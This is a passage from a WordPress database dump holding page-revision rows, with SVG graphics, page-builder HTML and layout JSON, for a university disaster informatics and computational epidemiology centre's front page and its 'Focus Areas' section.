d=\"M107.68,50.62,109,50l1.34-.16h1.37l3.38.24,7.53.69c3.79-.37,7.58-.94,11.38-1,2.78-.09,5.59.74,8.37.6,4.39-.2,8.66-.6,12.82,1.52,1.39.71,3.31.41,5,.5,5.85.3,11.71.5,17.55.87,5.36.33,10.71.82,16.06,1.29,2,.17,4,.53,6,.67a12.84,12.84,0,0,0,2.58-.33c-3.2-.48-6.38-1.08-9.58-1.41-4-.42-8.2-.17-12.13-1-6.24-1.36-12.38-2.39-18.8-1.53a24.07,24.07,0,0,1-6.73-.53A4.51,4.51,0,0,1,152.65,49c-1.62-2-2.9-4.19-4.57-6.09a4.87,4.87,0,0,0-3.17-1.67c-.6,0-1.54,1.58-1.78,2.58-.85,3.6-2,4.58-5.7,3.95-3-.52-6.07-2.29-8.83.75-.3.32-1.29,0-2,0l-17.77,0c-2.55,0-5.1-.13-7.63.08s-4.86.75-7.29,1.15l11.69,1.71Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M360.25,69.74a19.45,19.45,0,0,0,14.27-2c.71-.37,1.78,0,2.68,0l6.27-.07,2.08-.58,1.19-.92,4.8-1.7c-1-1.37-1.64-3.69-3.93-1.23A12,12,0,0,1,385,64.85c-.33-1-.63-2-1-3a18.81,18.81,0,0,0-1.68-4.41,12,12,0,0,0-3.45-3.06c-1.13-.74-2.77-1.81-3.68-1.45s-1.92,2.22-2,3.47c-.16,3.27.3,6.5,4,8.14l-5.48,2.41L366,69.46l1.26-4.74c-4.21,3.49-8.38,3.43-12.54,2.69.26.7.53,1.4.79,2.09A18.31,18.31,0,0,1,360.25,69.74Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M348.81,67.74c2.05,1.76,4.37,1.82,6.69,1.76-.26-.69-.53-1.39-.79-2.09-1.83-.33-3.65-.78-5.48-1.14-.8-.15-1.81.75-2.73,1.16C347.29,67.52,348.32,67.32,348.81,67.74Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M398.14,57.66c-1.34,1.74-2.11,3.92-3.14,5.9l-.21.18.13.24,4.18-3.2,1.3-.76a16.63,16.63,0,0,0,1.42-3.64c.68-4.85,3.49-7,8.2-6.2.6.09,1.37-.88,2.06-1.36-.95-.27-1.94-.86-2.84-.74-3.33.45-5.75-.55-7.18-3.7a12.14,12.14,0,0,0-1.77-2.05c-2.86,6.11-7.58.56-11.51,2.26a21.74,21.74,0,0,0,5.76,3.5C400,50.22,401.48,53.3,398.14,57.66Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M18,59.82c-3.68-.16-5.72,1.74-4.66,4.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1345.25,39.33c.3,0,.55.88.77,1.37.58,1.23,1.13,2.47,1.69,3.7l2.78-5.82-7-6-.67.1C1342.29,35.36,1339.64,38.82,1345.25,39.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1348.71,56.82c1.07,2,1.79,1.74,3.33.61.7-.52,2.73-.57,3-.14,2.09,3.45,6.52,5.43,6.51,10.21a2.57,2.57,0,0,0,.77,1.48c4,4.4,9.59,5.64,14.78,7.72-2.36-2.43-1.84-7-6.08-8.1-.31-.08-.28-1.2-.54-1.77a4.87,4.87,0,0,0-1.22-2c-2.44-1.76-3.56-4.63-2.31-7.25.46-1,1.66-1.6,2.52-2.39a10.27,10.27,0,0,1,1.53,2.56c1.57,6.2,2.6,7.28,7.45,7.5l.09,5.57,1.23,0c.27-1.59.53-3.18,1-5.86,3.67,4.78,7.64,5.42,12,3.82.32-2.42.6-4.58.9-6.79l-2.77-.25c2.64-2.3,2.94-6.83,6.84-7.06-.26,2.92-.5,5.68-.78,8.8,1.51-.67,2.58-1.51,3-1.26,2.8,1.75,4.12.21,5.78-1.86,1.06-1.32,2.8-1.86,3.72.87.47,1.39,2.2,3.53,3,3.39a24.34,24.34,0,0,0,7.85-3c.78-.44.74-2.47.89-3.8s.12-2.9.17-4.35l-4.43-3.18-2.82,4.13c-2.88-.62-5.19-1.4-7.54-1.54s-5.25,1.11-7.38.33c-4-1.47-7.74-1.09-12.06.48a60.15,60.15,0,0,0-1.34-6.22,5,5,0,0,0-2-2.32,8.13,8.13,0,0,0-2.6-.63c-4.54-1.08-9-2-13.14,1.33a1.15,1.15,0,0,1-.59.32c-1,0-2.67.35-3-.14a5.71,5.71,0,0,1-.79-3.75,3,3,0,0,1,2.19-1.91c2.28,0,3.34-1.09,3-3.06s-1-4.09-3.92-3.47l1,2.41c-5.2,4-5.45,7-1.59,12.2a7.69,7.69,0,0,1,1.12,4.78,16.93,16.93,0,0,1-2,6.45c-.66-2.71-1.33-5.41-2.15-8.73a12.13,12.13,0,0,1-2,2.32c-.81.54-2,1.24-2.76,1-3.9-1.42-7.57-.73-11.24.69C1346.42,55.58,1348.18,55.86,1348.71,56.82ZM1375,55.71l3.17.95c1.82-1.8,2.31-3.65,1.13-6.07-.37-.74.35-2,.57-3,1,.58,2.29.94,3,1.79a45.93,45.93,0,0,1,3.11,5.31c-2.2,5.44-3.26,6.29-5.41,4.5l-3.89,2.24-2.7-4.92Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1429.65,59.51l3.06-1.52c.23,2.5-1.93,5,1.42,6.94l1.95-4.61,6.73,4.13,2.06-6c2.61,1.08,5.58,1.46,7.18,3.14,2.69,2.82,2.31,3.16,4.89.34a8.88,8.88,0,0,1,1.73-1.1c-.55,1.79-1,3.11-1.36,4.43l.72.38,3.19-1.9,2.57,3.17,3.38-4c2.19,1.56,3.36.64,4.3-1.57a3.45,3.45,0,0,1,2.45-1.77c.65,0,2,1.33,1.92,1.9-.14,1-1.18,1.76-1.85,2.62-.24.31-.52.58-.8.9,2.72,2.6,3.66-1,5.56-1.39l1.82,2.69c3.6-1.56,7.17-2.85,10.48-4.63,2.13-1.15,3.15-.7,4.45,1.1,1.48,2.05,3.51,3.51,7.27,3.65l-3.55-4.65a38.14,38.14,0,0,1,3.73,1.53c4.47,2.55,6.71,2,9.73-2.09a4.21,4.21,0,0,1,2.82-1.14,11.3,11.3,0,0,1,3,.6c1.52.3,3.49.1,4.44,1,.75.71.27,2.73.34,4.33a9.11,9.11,0,0,0,1.13-.48c4.42-2.68,5-2.61,8.87,1a3,3,0,0,0,5-1.65,28.62,28.62,0,0,0,.39-3.35c-1.18-.17-2.38-.28-3.54-.54-.94-.21-2.19-.33-2.69-1-2.81-3.64-7.42-3-11-4.73-.53-.25-1.77,1.16-2.76,1.63-1.19.56-2.6,1.53-3.68,1.29-4.88-1.06-6.15-.72-8.55,3.33l-5.16-.84c1.76-1.94,3.09-3.39,4.34-4.75-1.52-2.92-3.62-2.05-5-.87s-1.88,3.11-3,5.11c.11-3.16-.94-4.58-4.1-4.6-2.37,0-4.7-1.27-7.09-1.67a11.57,11.57,0,0,0-5,.06c-5.69,1.72-11.31,3.2-17.18.85a3.25,3.25,0,0,0-1.64-.14c-4.84.8-9.6,1-14.13-1.42a2.26,2.26,0,0,0-1.89-.12c-3.88,2.49-7.63,1.6-11.47-.11-.83-.37-2.19-.7-2.78-.29a4.61,4.61,0,0,1-5,.26c-1.55-.71-3.2-1.21-5.14-1.92-.25.81-.51,1.61-.76,2.42C1424.18,52.92,1427.59,55.41,1429.65,59.51Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1551.42,67.2c.56-1.29,1-2.54,1.61-3.69,1-1.93,4.37-2.72,5.42-1.28,2.92,4,7,4.8,11.86,4.8-.43-1.29-.75-2.21-1-3l5.34-4.25c2.54,2.71,4.76,5.31,7.28,7.57.67.61,2.35.44,3.42.14a5,5,0,0,0,1.9-1.28c1.89.52,3.92,1.38,4.11,1.08,1.62-2.56,5.43-3.51,5.47-7.21-2.48-.1-5.16-.84-7.4-.15-2.72.84-4.89.35-7.47-.28a38,38,0,0,0-9.55-.55c-2.6,0-5.18.76-7.78.85-3.25.12-6.57-.48-9.76,0-2.3.31-3.86.26-5.24-1.75a3.27,3.27,0,0,0-2.34-.91c-1.65,2.19-3.6,3.28-6.38,2.48-.1,0-.36.5-.55.77l1,6.9C1544.78,64.68,1547.93,65.4,1551.42,67.2Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1639.23,56.13l5,.11c2.64,6.34,6.6,11.29,14.84,10.85-.46,4.49,2,5.65,5.79,5.51,1.84-.07,3.7.16,5.55.25l1.69,4.38,1.21.06,1.76-.72c-.47-1-1-2-1.39-3-1.48-4-2.47-4.47-6.42-3.34a9.44,9.44,0,0,1-2.19.11c-.91-5.38-1.74-6.27-5-5.53-2.64.61-4-.91-3.32-3.67,1.13-4.46.57-5-4.39-5.07-2.74,0-5.27-.5-7-3.14-2.47-3.86-3.72-4.21-8.1-2.84l3.32,1.35Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1623.78,53.05c3.4-.23,6.83,0,10.11,0l2.21-3.28c-.78-.31-1.59-.93-2.34-.86-5,.43-10,1-15,1.55C1619.85,52.5,1621.42,53.22,1623.78,53.05Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1361.67,35.06c-2.1-.64-6.14,1-7,2.88C1357.09,37.24,1360.28,38.33,1361.67,35.06Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1341,50.21l1.76,2.4c1.6-.91,3.2-1.81,4.8-2.73,1.29-.74,2.32-1.54.54-2.86l-6.89,2.85h0Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1339.42,50.35l1.6-.14.21-.34-1.82-.1Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n </svg>\n </div>\n <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"22-h25\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-213 style-local-22-h25 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-214-outer style-local-22-h26-outer\">\n <div data-colibri-id=\"22-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-214 style-local-22-h26 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h27\" class=\"h-global-transition-all h-heading style-215 style-local-22-h27 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-215 style-local-22-h27\">\n <!---->\n <!---->\n <h3 class=\"\">Center for Disaster Informatics & Computational Epidemiology</h3>\n </div>\n </div>\n <div data-colibri-id=\"22-h28\" class=\"h-lead h-text h-text-component style-216 style-local-22-h28 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Enabling Data-Driven Disaster Assessment & Planning\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"22-h29\" class=\"h-x-container style-677 style-local-22-h29 position-relative h-element\">\n <!---->\n <div class=\"h-x-container-inner style-dynamic-22-h29-group style-677-spacing style-local-22-h29-spacing\"><span class=\"h-button__outer style-678-outer style-local-22-h30-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"https://gsudice.dataconn.net/about/our-mission/\" data-colibri-id=\"22-h30\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-678 style-local-22-h30 position-relative\"><!----><!----> <span>our mission</span></a>\n </span>\n </div>\n </div>\n <div data-colibri-id=\"22-h31\" class=\"h-x-container style-217 style-local-22-h31 position-relative h-element\">\n <!---->\n <div class=\"h-x-container-inner style-dynamic-22-h31-group style-217-spacing style-local-22-h31-spacing\"><span class=\"h-button__outer style-218-outer style-local-22-h32-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"/about/\" data-colibri-id=\"22-h32\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-218 style-local-22-h32 position-relative\"><!----><!----> <span>Learn More</span></a>\n </span>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-220-outer style-local-22-h33-outer\">\n <div data-colibri-id=\"22-h33\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-220 style-local-22-h33 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h34\" class=\"d-block style-221 style-local-22-h34 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/unsplash.jpg\" class=\"wp-image-258 style-221-image style-local-22-h34-image\">\n <div class=\"h-image__frame h-image__frame_shadow style-221-frameImage style-local-22-h34-frameImage\"></div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','header_front_page','','inherit','closed','closed','','22-revision-v1','','','2022-04-29 09:17:36','2022-04-29 13:17:36','',22,'https://gsudice.dataconn.net/?p=1297',0,'revision','',0),(1301,1,'2022-04-29 09:59:22','2022-04-29 13:59:22','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Overlappable\",\"attrs\":{\"id\":\"overlappable\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c4\",\"parentId\":\"20-c3\",\"partialId\":20,\"styleRef\":336,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c5\",\"parentId\":\"20-c3\",\"partialId\":20,\"styleRef\":337,\"type\":\"content\"}],\"id\":\"20-c3\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":335,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c7\",\"parentId\":\"20-c6\",\"partialId\":20,\"children\":[{\"name\":\"hop-heading\",\"slot\":null,\"parentId\":\"20-c7\",\"index\":0,\"id\":\"20-c8\",\"partialId\":20,\"styleRef\":334,\"type\":\"content\",\"props\":{\"content\":\"Focus Areas<br>\"}}],\"styleRef\":333,\"type\":\"content\"}],\"id\":\"20-c6\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":331,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"20-c10\",\"parentId\":\"20-c9\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c10\",\"index\":0,\"id\":\"20-c11\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/server\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c10\",\"index\":1,\"id\":\"20-c12\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"disease & disaster modeling<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c10\",\"index\":1,\"id\":\"20-c13\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Develop data-driven, computational solutions to address challenges posed by disaster and disease risk assessment, forecasting, and mitigation, including issues aimed at assessing and reducing structural disparities<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c14\",\"parentId\":\"20-c9\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c14\",\"index\":0,\"id\":\"20-c15\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/database\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c14\",\"index\":1,\"id\":\"20-c16\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"data as a service<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c14\",\"index\":1,\"id\":\"20-c17\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Provide data and computational support to researchers who need extensive data processing and analysis but may not have the necessary technical skills and computational infrastructure<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c18\",\"parentId\":\"20-c9\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c18\",\"index\":0,\"id\":\"20-c19\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/users\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c18\",\"index\":1,\"id\":\"20-c20\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"Impact assessment<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c18\",\"index\":1,\"id\":\"20-c21\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Facilitate application of data analysis tools that can spark critical insights into the impacts of disasters and diseases on societies and the environment, particularly among vulnerable population groups<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"}],\"id\":\"20-c9\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":272,\"type\":\"content\"}],\"id\":\"20-c2\",\"parentId\":\"20-c1\",\"partialId\":20,\"styleRef\":271,\"type\":\"content\"}],\"id\":\"20-c1\",\"partialId\":20,\"styleRef\":228,\"type\":\"content\"}','','','inherit','closed','closed','','168-revision-v1','','','2022-04-29 09:59:22','2022-04-29 13:59:22','',168,'https://gsudice.dataconn.net/?p=1301',0,'revision','',0),(1302,1,'2022-04-29 09:59:22','2022-04-29 13:59:22','<div data-colibri-id=\"20-c1\" class=\"style-228 style-local-20-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"20-c2\" id=\"overlappable\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-271 style-local-20-c2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"20-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-335 style-local-20-c3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-336-outer style-local-20-c4-outer\">\n <div data-colibri-id=\"20-c4\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-336 style-local-20-c4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-337-outer style-local-20-c5-outer\">\n <div data-colibri-id=\"20-c5\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-337 style-local-20-c5 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"20-c6\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-331 style-local-20-c6 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-333-outer style-local-20-c7-outer\">\n <div data-colibri-id=\"20-c7\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-333 style-local-20-c7 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c8\" class=\"h-global-transition-all h-heading style-334 style-local-20-c8 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-334 style-local-20-c8\">\n <!---->\n <!---->\n <h1 class=\"\">Focus Areas</h1>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"20-c9\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-0 gutters-row-v-2 style-272 style-local-20-c9 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c10-outer\">\n <div data-colibri-id=\"20-c10\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c10 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c11\" class=\"h-icon style-274 style-local-20-c11 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c11-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"server\" viewBox=\"0 0 1792 1896.0833\"><path d=\"M128 1408h1024v-128H128v128zm0-512h1024V768H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zM128 384h1024V256H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm0-512q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm96 832v384H0v-384h1792zm0-512v384H0V640h1792zm0-512v384H0V128h1792z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c12\" class=\"h-global-transition-all h-heading style-275 style-local-20-c12 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c12\">\n <!---->\n <!---->\n <h5 class=\"\">disease & disaster modeling</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c13\" class=\"h-text h-text-component style-276 style-local-20-c13 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Develop data-driven, computational solutions to address challenges posed by disaster and disease risk assessment, forecasting, and mitigation, including issues aimed at assessing and reducing structural disparities</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c14-outer\">\n <div data-colibri-id=\"20-c14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c14 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c15\" class=\"h-icon style-274 style-local-20-c15 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c15-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"database\" viewBox=\"0 0 1542.7035 1896.0833\"><path d=\"M768 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5T103 896 0 768V598q119 84 325 127t443 43zm0 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1536v-170q119 84 325 127t443 43zm0-384q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1152V982q119 84 325 127t443 43zM768 0q208 0 385 34.5t280 93.5 103 128v128q0 69-103 128t-280 93.5T768 640t-385-34.5T103 512 0 384V256q0-69 103-128t280-93.5T768 0z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c16\" class=\"h-global-transition-all h-heading style-275 style-local-20-c16 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c16\">\n <!---->\n <!---->\n <h5 class=\"\">data as a service</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c17\" class=\"h-text h-text-component style-276 style-local-20-c17 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Provide data and computational support to researchers who need extensive data processing and analysis but may not have the necessary technical skills and computational infrastructure</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c18-outer\">\n <div data-colibri-id=\"20-c18\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c18 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c19\" class=\"h-icon style-274 style-local-20-c19 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c19-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"users\" viewBox=\"0 0 1920 1896.0833\"><path d=\"M593 896q-162 5-265 128H194q-82 0-138-40.5T0 865q0-353 124-353 6 0 43.5 21t97.5 42.5T384 597q67 0 133-23-5 37-5 66 0 139 81 256zm1071 637q0 120-73 189.5t-194 69.5H523q-121 0-194-69.5T256 1533q0-53 3.5-103.5t14-109T300 1212t43-97.5 62-81 85.5-53.5T602 960q10 0 43 21.5t73 48 107 48 135 21.5 135-21.5 107-48 73-48 43-21.5q61 0 111.5 20t85.5 53.5 62 81 43 97.5 26.5 108.5 14 109 3.5 103.5zM640 256q0 106-75 181t-181 75-181-75-75-181 75-181T384 0t181 75 75 181zm704 384q0 159-112.5 271.5T960 1024 688.5 911.5 576 640t112.5-271.5T960 256t271.5 112.5T1344 640zm576 225q0 78-56 118.5t-138 40.5h-134q-103-123-265-128 81-117 81-256 0-29-5-66 66 23 133 23 59 0 119-21.5t97.5-42.5 43.5-21q124 0 124 353zm-128-609q0 106-75 181t-181 75-181-75-75-181 75-181 181-75 181 75 75 181z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c20\" class=\"h-global-transition-all h-heading style-275 style-local-20-c20 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c20\">\n <!---->\n <!---->\n <h5 class=\"\">Impact assessment</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c21\" class=\"h-text h-text-component style-276 style-local-20-c21 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Facilitate application of data analysis tools that can spark critical insights into the impacts of disasters and diseases on societies and the environment, particularly among vulnerable population groups</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>\n</div>\n</div>\n</div>','Front Page','','inherit','closed','closed','','20-revision-v1','','','2022-04-29 09:59:22','2022-04-29 13:59:22','',20,'https://gsudice.dataconn.net/?p=1302',0,'revision','',0),(1303,1,'2022-04-29 09:59:22','2022-04-29 